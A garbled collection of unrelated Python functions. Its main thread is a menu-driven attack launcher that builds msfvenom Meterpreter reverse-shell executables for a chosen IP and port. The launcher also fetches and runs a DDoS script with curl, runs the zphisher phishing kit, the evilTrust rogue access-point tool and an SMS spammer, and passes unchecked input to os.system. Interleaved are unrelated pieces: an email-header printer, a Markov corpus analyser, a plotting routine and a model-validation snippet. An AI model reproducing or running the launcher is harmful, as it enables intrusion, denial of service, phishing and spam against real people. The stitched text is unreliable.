def decoracion(): purple() # hola print(" | 1 -->> MsfVenom") print(" | 2 -->> DDoS") print(" | 3 -->> Phishing") print(" | 4 -->> Wpscan") print(" | 5 -->> EvilTrust") print(" | 6 -->> Spam SMS") print(" | 7 -->> Exit") option = input(" +-> ") if option == "1": msf() if option == "2": ddos() if option == "3": phishing() if option == "4": wpscan() if option == "5": eviltrust() if option == "6": sms() if option == "7": os.system("clear") exit()
def sms(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Download Tool") print(" | 2 -->> Execute Tool") print(" | 3 -->> Exit") option = input(" +-> ") if option == "1": print("Downloading...") yellow() os.system("git clone https://github.com/Darkmux/SETSMS") red() print("Downloaded!") time.sleep(2) while True: sms() if option == "2": os.system("mv SETSMS/* .") os.system("chmod 777 SETSMS.sh") os.system("bash SETSMS.sh") if option == "3": start_menu()
def eviltrust(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Download Tool") print(" | 2 -->> Execute Tool") print(" | 3 -->> Exit") option = input(" +-> ") if option == "1": print("Downloading...") yellow() os.system("git clone https://github.com/s4vitar/evilTrust") red() print("Downloaded!") time.sleep(2) while True: eviltrust() if option == "2": os.system("mv evilTrust/* .") os.system("clear") os.system("sudo bash evilTrust.sh -m terminal") if option == "3": start_menu()
def phishing(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Download Tool") print(" | 2 -->> Execute tool") print(" | 3 -->> Exit") x = input(" ↳ ") print("") if x == "1": yellow() os.system("git clone https://github.com/htr-tech/zphisher") print("") red() print("Downloaded!!") time.sleep(1) while True: phishing() if x == "2": print("") os.system("mv zphisher/* .") os.system("mv zphisher/.sites .") os.system("bash zphisher.sh") if x == "3": start_menu()
def ddos(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Download Tool") print(" | 2 -->> Execute tool") print(" | 3 -->> Exit") x = input(" ↳ ") print("") if x == "1": yellow() print("") print("Downloading...") os.system( "curl https://raw.githubusercontent.com/yorkox0/exaple01/main/ddos.py -o ddos.py" ) red() print("Downloaded!!") time.sleep(2) while True: ddos() if x == "2": print("") os.system("python3 ddos.py") if x == "3": start_menu()
def msf(): os.system("clear") red() print(banner) purple() print(" | 1 -->> Windows reverse shell") print(" | 2 -->> Linux reverse shell x86") print(" | 3 -->> Linux reverse shell x64") print(" | 4 -->> Exit") x = input(" ↳ ") if x == "1": print("") ip = input("IP -->> ") port = input("PORT ->> ") yellow() print("Creating payload...") os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + port + " -f exe > download.exe") red() print("FileName == download.exe") time.sleep(2) while True: msf() if x == "2": print("") ip = input("IP -->> ") port = input("PORT ->>") yellow() print("Creating payload...") os.system("msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + port + " -f elf > downloadx86.elf") red() print("FileName == downloadx86.elf") time.sleep(2) while True: msf() if x == "3": print("") ip = input("IP -->> ") port = input("PORT ->> ") yellow() print("Creating payload...") os.system("msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + port + " -f elf > downloadx64.elf") red() time.sleep(2) print("FileName == downloadx64.elf") while True: msf() if x == "4": start_menu()
def basic_parse(self):
    """Print the basic headers of the loaded e-mail, one colorized line each.

    Reads header values out of ``self.eml`` (a mapping indexed by header
    name).  The per-field ``rjust`` widths line the ``:`` separators up in
    the terminal output.
    NOTE(review): assumes ``self.eml`` tolerates missing headers (e.g. an
    ``email.message.Message`` returns None) — confirm against the loader.
    """
    # (colorizer, printed label, rjust width for ':', header key)
    fields = (
        (blue, "[To]", 11, "To"),
        (green, "[From]", 9, "From"),
        (yellow, "[Sender]", 7, "Sender"),
        (orange, "[Delivered To]", 1, "Delivered-To"),
        (red, "[Subject]", 6, "Subject"),
        (purple, "[Date]", 9, "Date"),
        (grey, "[Content-Type]", 1, "Content-Type"),
    )
    for colorize, label, pad, key in fields:
        print(bold(colorize(label)), ":".rjust(pad), self.eml[key])
def wpscan(): os.system("clear") red() print(banner) blue() print("") purple() web = input("Web whith https:// -->> ") yellow() print("Do you want to save it on web.txt? y/n") if input("-->> ") == "y": os.system("wpscan --url " + web + ">> web.txt") red() print("Saved!!") time.sleep(1) while True: start_menu() else: os.system("wpscan --url " + web) red() input("Press INTRO to exit") while True: start_menu()
def analyze_corpus(self, max_chains):
    """
    Analyzes the corpuses and generates a number of word locations to use for assessing probabilities

    :param max_chains: the maximum number of links in a chain the corpus needs to be able to generate
    :return: an array of arrays - each inner array holds key-value pairs, where the key is a history of words,
        and the value is the index of the word that appears subsequently
    :raises ValueError: if max_chains < 2 (a chain needs at least one word of history)
    """
    # Reject degenerate chain lengths up front.
    if max_chains < 2:
        raise ValueError(
            "Chain length must be at least 2 (two is not recommended tho)")
    # # NOTE: It seems more time efficient to just generate new chaining data, as bringing a 50-120MB file into
    # # memory doesn't seem to be too quick in comparison
    # chain_data = "bot_files/{0}/{0}_markov_data.json".format(self.handle)
    # if self.check_markov_data():  # if good enough, load
    #     if os.path.exists(chain_data):
    #         print colors.yellow("retrieving chaining data...\n")
    #         with open(chain_data, "rb") as f:
    #             return json.load(f)
    print colors.yellow("analyzing corpus...")
    # NOTE(review): [[]] * max_chains makes every slot alias ONE shared list,
    # but each slot is overwritten below before use, so the aliasing is
    # harmless here.
    corpuses = [[]] * max_chains  # creates bodies of chain occurrences all at once
    # Depth 1: single-word occurrence survey seeds index 0.
    corpuses[0] = self.survey_one_word()
    print colors.purple("\t1-chaining done")
    # Remaining depths: survey n-word histories (n+1 words per chain link).
    for n in range(1, max_chains):
        corpuses[n] = self.survey_n_words(n)
        print colors.purple("\t%s-chaining done" % (n + 1))
    print
    # print colors.yellow("\nstoring...\n")
    # with open(chain_data, 'wb') as outfile:
    #     json.dump(corpuses, outfile)
    # for x in corpuses[2]:  # see how the data is stored
    #     print ("\"%s\"" % x) + "\t:\t" + str(corpuses[2][x])
    return corpuses
def model_nb_plays_generator_with_noise():
    """Animate ground-truth vs. predicted outputs for an nb-plays model run.

    All configuration is hard-coded in the locals below.  The function:
      1. selects dataset-path keys from ``constants.DATASET_PATH`` based on
         the ``interp`` / ``run_test`` / ``diff_weights`` / ``train_invert``
         toggles;
      2. loads the ground-truth dataset and, when available, a predictions
         dataset (otherwise predictions fall back to the ground truth);
      3. for ``interp != 1``: either loads a previously interpolated dataset,
         or generates + saves one and then terminates the process via
         ``sys.exit(0)`` (generation-only run);
      4. writes snake-mode and outputs-vs-time GIF animations through
         ``utils.save_animation``.

    FIX: removed a leftover ``import ipdb; ipdb.set_trace()`` debugger
    breakpoint, and a dead ``np.interp`` call whose result was immediately
    overwritten by the cubic ``interp1d`` interpolation.

    NOTE(review): depends on module-level names ``constants``, ``tdata``,
    ``utils``, ``LOG``, ``coloring``, ``np``, ``os``, ``sys`` and
    ``interp1d`` — confirm they are imported at file top.
    """
    step = 40
    method = 'sin'            # alternative: 'noise'
    with_noise = True
    diff_weights = True
    run_test = False
    train_invert = True
    interp = 10
    force_rerun = False
    mu = 0
    sigma = 2
    points = 1000
    input_dim = 1

    # ground truth
    nb_plays = 20
    units = 1
    state = 0
    activation = None         # alternative: 'tanh'

    # predictions
    __nb_plays__ = 20
    __units__ = 1
    __state__ = 0
    __activation__ = None     # alternative: 'tanh'

    loss_name = 'mse'

    if method == 'noise':
        with_noise = True
    if with_noise is False:
        # A noise-free run forces a degenerate noise distribution.
        mu = 0
        sigma = 0

    # Select the DATASET_PATH keys for the current configuration.
    # Unsupported combinations hit a bare `raise` (placeholder branch;
    # raises RuntimeError because there is no active exception).
    if interp == 1:
        if run_test is False:
            if diff_weights is True:
                base_file_key = 'models_diff_weights'
                predictions_file_key = 'models_diff_weights_predictions'
                models_gif_key = 'models_diff_weights_gif'
                models_snake_gif_key = 'models_diff_weights_snake_gif'
                models_ts_outputs_gif_key = 'models_diff_weights_ts_outputs_gif'
            else:
                base_file_key = 'models'
                predictions_file_key = 'models_predictions'
                models_gif_key = 'models_gif'
                models_snake_gif_key = 'models_snake_gif'
                models_ts_outputs_gif_key = 'models_ts_outputs_gif'
        elif run_test is True:
            if diff_weights is True:
                base_file_key = 'models_diff_weights_test'
                predictions_file_key = 'models_diff_weights_test_predictions'
                models_gif_key = 'models_diff_weights_test_gif'
                models_snake_gif_key = 'models_diff_weights_test_snake_gif'
                models_ts_outputs_gif_key = 'models_diff_weights_test_ts_outputs_gif'
            else:
                raise
    elif interp != 1:
        if run_test is False:
            if diff_weights is True:
                if train_invert is False:
                    base_file_key = 'models_diff_weights'
                    models_interp_key = 'models_diff_weights_interp'
                    predictions_file_key = 'models_diff_weights_predictions_interp'
                    models_gif_key = 'models_diff_weights_interp_gif'
                    models_snake_gif_key = 'models_diff_weights_snake_interp_gif'
                    models_ts_outputs_gif_key = 'models_diff_weights_ts_outputs_interp_gif'
                elif train_invert is True:
                    # Inverted training: inputs/outputs are swapped below.
                    base_file_key = 'models_diff_weights_interp'
                    models_interp_key = 'models_diff_weights_invert_interp'
                    predictions_file_key = 'models_diff_weights_invert_interp_predictions'
                    models_gif_key = 'models_diff_weights_invert_interp_gif'
                    models_snake_gif_key = 'models_diff_weights_invert_snake_interp_gif'
                    models_ts_outputs_gif_key = 'models_diff_weights_invert_ts_outputs_interp_gif'
            else:
                raise
        elif run_test is True:
            if diff_weights is True:
                base_file_key = 'models_diff_weights_test'
                models_interp_key = 'models_diff_weights_test_interp'
                predictions_file_key = 'models_diff_weights_test_predictions_interp'
                models_gif_key = 'models_diff_weights_test_interp_gif'
                models_snake_gif_key = 'models_diff_weights_test_snake_interp_gif'
                models_ts_outputs_gif_key = 'models_diff_weights_test_ts_outputs_interp_gif'
            else:
                raise

    if run_test is True and method == 'sin':
        method = 'mixed'

    fname = constants.DATASET_PATH[base_file_key].format(
        interp=interp, method=method, activation=activation, state=state,
        mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points,
        input_dim=input_dim)
    _inputs, ground_truth = tdata.DatasetLoader.load_data(fname)
    LOG.debug("Load **ground-truth** dataset from file: {}".format(
        coloring.cyan(fname)))
    predicted_fname = constants.DATASET_PATH[predictions_file_key].format(
        interp=interp, method=method, activation=activation, state=state,
        mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points,
        input_dim=input_dim, __activation__=__activation__,
        __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__,
        loss=loss_name)

    if interp == 1:
        try:
            _, predictions = tdata.DatasetLoader.load_data(predicted_fname)
            LOG.debug("Load **predicted** dataset from file: {}".format(
                coloring.cyan(predicted_fname)))
        except FileNotFoundError:
            LOG.warn("GROUND TRUTH and PREDICTIONS are the SAME dataset")
            predictions = ground_truth
    elif interp != 1:
        models_interp_fname = constants.DATASET_PATH[models_interp_key].format(
            interp=interp, method=method, activation=activation, state=state,
            mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points,
            input_dim=input_dim, __activation__=__activation__,
            __state__=__state__, __units__=__units__,
            __nb_plays__=__nb_plays__, loss=loss_name)
        if force_rerun is False and os.path.isfile(models_interp_fname):
            # Interpolated dataset already on disk: load it and clip all
            # series to a common length.
            LOG.debug("Already interploted...")
            t_interp = np.linspace(1, points,
                                   (int)(interp * points - interp + 1))
            _inputs_interp, ground_truth_interp = tdata.DatasetLoader.load_data(
                models_interp_fname)
            LOG.debug("Load **ground-truth** dataset from file: {}".format(
                coloring.purple(models_interp_fname)))
            try:
                _, predictions_interp = tdata.DatasetLoader.load_data(
                    predicted_fname)
                LOG.debug("Load **predicted** dataset from file: {}".format(
                    coloring.cyan(predicted_fname)))
            except FileNotFoundError:
                LOG.warn("GROUND TRUTH and PREDICTIONS are the SAME dataset")
                predictions_interp = ground_truth_interp
            clip_length = min(predictions_interp.shape[0],
                              _inputs_interp.shape[0])
            t_interp = t_interp[:clip_length]
            _inputs_interp = _inputs_interp[:clip_length]
            ground_truth_interp = ground_truth_interp[:clip_length]
            predictions_interp = predictions_interp[:clip_length]
        else:
            if train_invert is False:
                diff = _inputs[1:] - _inputs[:-1]
                LOG.debug("Max jump between two successive x is {}".format(
                    np.max(np.abs(diff))))
                t_ = np.linspace(1, points, points)
                # Cubic interpolation of the inputs over a denser time grid.
                f2 = interp1d(t_, _inputs, kind='cubic')
                t_interp = np.linspace(1, points,
                                       (int)(interp * points - interp + 1))
                _inputs_interp = f2(t_interp)
                # Clip to a multiple of input_dim.
                clip_length = int((t_interp.shape[0] // input_dim) * input_dim)
                _inputs_interp = _inputs_interp[:clip_length]
                _, ground_truth_interp = tdata.DatasetGenerator.systhesis_model_generator(
                    inputs=_inputs_interp,
                    nb_plays=nb_plays,
                    points=t_interp.shape[0],
                    units=units,
                    mu=None,
                    sigma=None,
                    input_dim=input_dim,
                    activation=activation,
                    with_noise=None,
                    method=None,
                    diff_weights=diff_weights)
                predictions_interp = ground_truth_interp
                LOG.debug("Save interploted dataset to file: {}".format(
                    coloring.cyan(models_interp_fname)))
                tdata.DatasetSaver.save_data(_inputs_interp,
                                             ground_truth_interp,
                                             models_interp_fname)
                # Generation-only run: stop once the dataset is written.
                sys.exit(0)
            elif train_invert is True:
                # Inverted training: swap the roles of inputs and outputs,
                # save, and stop.
                _inputs_interp, ground_truth_interp = ground_truth, _inputs
                tdata.DatasetSaver.save_data(_inputs_interp,
                                             ground_truth_interp,
                                             models_interp_fname)
                LOG.debug("Save interploted dataset to file: {}".format(
                    coloring.cyan(models_interp_fname)))
                sys.exit(0)
        _inputs = _inputs_interp
        ground_truth = ground_truth_interp
        predictions = predictions_interp

    models_gif_fname = constants.DATASET_PATH[models_gif_key].format(
        interp=interp, method=method, activation=activation, state=state,
        mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points,
        input_dim=input_dim, __activation__=__activation__,
        __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__,
        loss=loss_name)
    models_snake_gif_fname = constants.DATASET_PATH[models_snake_gif_key].format(
        interp=interp, method=method, activation=activation, state=state,
        mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points,
        input_dim=input_dim, __activation__=__activation__,
        __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__,
        loss=loss_name)
    models_ts_outputs_gif_fname = constants.DATASET_PATH[models_ts_outputs_gif_key].format(
        interp=interp, method=method, activation=activation, state=state,
        mu=mu, sigma=sigma, units=units, nb_plays=nb_plays, points=points,
        input_dim=input_dim, __activation__=__activation__,
        __state__=__state__, __units__=__units__, __nb_plays__=__nb_plays__,
        loss=loss_name)

    LOG.debug("Write outputs vs. inputs {} into file {}".format(
        coloring.red("(sequence mode)"), coloring.cyan(models_gif_fname)))
    outputs = np.vstack([ground_truth, predictions]).T
    colors = utils.generate_colors(outputs.shape[-1])
    inputs = np.vstack([_inputs for _ in range(outputs.shape[-1])]).T
    # Sequence-mode animation is intentionally disabled; its filename is
    # still computed and logged above.
    # utils.save_animation(inputs, outputs, models_gif_fname, step=step, colors=colors)

    # SNAKE mode: every series is doubled before animating.
    _inputs = np.hstack([_inputs, _inputs])
    ground_truth = np.hstack([ground_truth, ground_truth])
    predictions = np.hstack([predictions, predictions])
    inputs = np.vstack([_inputs for _ in range(outputs.shape[-1])]).T
    outputs_snake = np.vstack([ground_truth, predictions]).T
    LOG.debug("Write outputs vs. inputs {} into file {}".format(
        coloring.red("(snake mode)"), coloring.cyan(models_snake_gif_fname)))
    utils.save_animation(inputs, outputs_snake, models_snake_gif_fname,
                         step=step, colors=colors, mode="snake")

    # Outputs vs. time: x-axis is the (possibly interpolated) time grid.
    if interp == 1:
        _inputs = np.arange(points)
    else:
        _inputs = t_interp
    inputs = np.vstack([_inputs for _ in range(outputs.shape[-1])]).T
    LOG.debug("Write outputs vs. ts into file {}".format(
        coloring.cyan(models_ts_outputs_gif_fname)))
    utils.save_animation(inputs, outputs, models_ts_outputs_gif_fname,
                         step=points, colors=colors)
from validator import val


# Trivial identity regressor used as a smoke test for the validator:
# predict(X) echoes X unchanged, so the reported score reflects the
# post-processing pipeline rather than any learned model.
# NOTE(review): BaseEstimator/RegressorMixin (sklearn), Average,
# CoupleEqualizerFast, MetricEqualizer, colors, joblib and os must already
# be in scope here — confirm against the full module's imports.
class SimModel(BaseEstimator, RegressorMixin):
    def fit(self, X, y):
        # No training needed for the identity model.
        pass

    def predict(self, X):
        # Identity prediction: return the inputs unchanged.
        return X


print("testing sim score")
local = val(algs=[SimModel()], post=[Average()])
# NOTE(review): colors.purple/green return values are discarded here —
# presumably they print as a side effect; verify against the colors helper.
colors.purple(local)
colors.green(local["score"])
# Re-validate every persisted model under ./models with the full set of
# post-processing equalizers.
# NOTE(review): the loop's `local` result is never printed or stored —
# presumably val() reports as a side effect; verify.
for model in os.listdir("models"):
    model = joblib.load(os.path.join("models", model))
    local = val(algs=[model],
                post=[
                    Average(),
                    CoupleEqualizerFast(),
                    MetricEqualizer(metric="zscore"),
                    MetricEqualizer(metric="percentage"),
                    MetricEqualizer(metric="zscore_median"),
                    MetricEqualizer(metric="percentage_median"),
                    MetricEqualizer(metric="distance"),
                    MetricEqualizer(metric="distance_median")
                ])
def start_menu(): os.system("clear") red() print(banner) purple() decoracion()